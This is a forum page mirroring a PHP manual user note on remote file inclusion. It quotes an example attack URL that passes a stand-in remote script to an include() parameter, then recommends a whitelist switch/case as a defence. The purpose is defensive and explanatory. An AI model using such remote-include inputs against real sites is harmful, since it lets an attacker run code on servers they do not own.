Professional Web Applications Themes

Reply to Thread

Post a reply to the thread: note 33957 added to features.remote-files

Your Message

Click here to log in

 

Send Trackbacks to (Separate multiple URLs with spaces)

You may choose an icon for your message from this list

Topic Review (Newest First)

  • July 11th, 10:41 PM
    Kuju@rack1.php.net

    note 33957 added to features.remote-files

    In response too:

    --------------------

    "Be careful when you use something like index.php?showpage=news.php and include() that $showpage file.
    If a malicious user would call your script as index.php?showpage=http://some.server/script.php it would include that script and run it in *your* script's scope.

    -------------------

    Thats true......I suggest to pass a parameter that only your code understands, and have a switch / case statement to handle the parameter. Then you can decide what to do with it, every other parameter is discarded.

    Ex:

    -----------
    index.php?showpage=1
    ---------

    in the code that receives this parameter:

    ---------------

    if (!empty($_GET['showpage']))
    {
    switch($_GET['showpage'])
    {
    case '1':include_once 'inc/news.htm'; break;
    case '2':include_once 'inc/scores.htm'; break;
    case '3':include_once 'inc/pub.htm'; break;
    default: include_once 'inc/index.htm';
    }
    }
    else
    include_once 'inc/index.htm';
    ------------

    It has worked for me and prevents hacking through the URL. If anyone sees a major default in this please let me know, I will change my approche to a safer one.

    Kuju
    ----
    Manual Page -- [url]http://www.php.net/manual/en/features.remote-files.php[/url]
    Edit Note -- [url]http://master.php.net/manage/user-notes.php?action=edit+33957[/url]
    Delete Note -- [url]http://master.php.net/manage/user-notes.php?action=delete+33957&report=yes[/url]
    Reject Note -- [url]http://master.php.net/manage/user-notes.php?action=reject+33957&report=yes[/url]

Posting Permissions

  • You may not post new threads
  • You may post replies
  • You may not post attachments
  • You may not edit your posts
  •  

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139